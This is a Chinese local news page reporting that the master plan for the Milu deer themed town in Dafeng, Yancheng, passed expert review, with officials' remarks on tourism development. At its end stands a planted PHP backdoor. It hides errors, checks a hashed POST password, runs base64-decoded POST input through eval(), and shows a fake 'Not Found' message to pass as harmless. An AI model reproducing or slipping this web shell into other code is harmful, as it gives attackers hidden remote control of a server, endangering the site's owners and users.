最新要闻

首页 > 最新要闻 >

    麋鹿风情小镇总体规划通过评审

           8月31日,我区召开盐城麋鹿风情小镇总体规划评审会。市委常委、区委书记王荣,区长宋勇,盐城国投集团党委书记、董事长戴同彬,区政协主席袁国萍等出席。
           为进一步丰富旅游业态,提升旅游品质,打响旅游品牌,我区将建设集生态旅游、健康养生、休闲度假、陶冶文化于一体的麋鹿风情小镇。在规划编制过程中,规划编制单位经过多轮实地考察、深入沟通、全面对接、反复修改,形成了规划编制初步成果,提交昨天的会议进行评审。评审会上,规划编制单位介绍了规划编制情况,来自四川大学旅游学院、无锡市旅游行业协会、中国城镇化促进会旅游休闲研究中心等单位的7位专家,从不同角度、不同侧面对方案进行了评审,为麋鹿小镇的建设和发展现场“把脉”。
           王荣认真听取发言后指出,大丰旅游资源丰富,景点建设如火如荼,旅游工作不断突破,走出了一条市场化、特色化、社会化的发展之路。当前,我区首批国家全域旅游示范区创建、荷兰花海国家5A级景区创建、麋鹿风情小镇建设三大旅游重点工作正在紧锣密鼓地推进中,这些旅游新亮点将为大丰及盐城的旅游工作添上浓墨重彩的一笔。特别是麋鹿风情小镇建设,在5A级景区中华麋鹿园的辐射效应下,将与麋鹿园景区形成联动发展的大格局,发展前景广阔,对做大做强麋鹿文化产业将起到巨大的推动作用。他希望规划编制单位充分吸收专家组的评审意见,抓紧对总体规划进行完善提升。要深化特色塑造,进一步凝练主题,彰显优势,深度挖掘麋鹿文化,提升风情小镇内涵,精心打造独具特色的风情旅游目的地。要充分考虑景与人的关系,做深做透景点与人的文章,将原住居民融入景点打造中,实现景区和周边百姓的良性互动,让景区更具吸引力,让游客留得住、让百姓更受益。要抢抓大丰进入高铁时代的机遇,将小镇建设融入大丰、盐城、全省旅游发展的大格局中,并与其他景区形成联动,让景点实现组团式、融合式发展。王荣希望相关部门全力以赴支持麋鹿风情小镇建设,加快推进步伐,确保项目早日开工,为“生态优先、绿色发展”之路创造新业绩,为建设“强富美高”新大丰、新盐城作出应有的贡献。
           经过深入评审,专家组一致认为规划符合大丰经济发展实际,站位高、定位准,内容全面、结构完整、重点突出,对市场竞争状况进行了深入分析,并提出了营销及开发策略,具有很强的操作性和针对性,一致同意通过评审。同时希望课题组根据专家提出的意见进行修改完善,按规定程序报批和组织实施。
    区领导郭超参加活动。

     

     

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>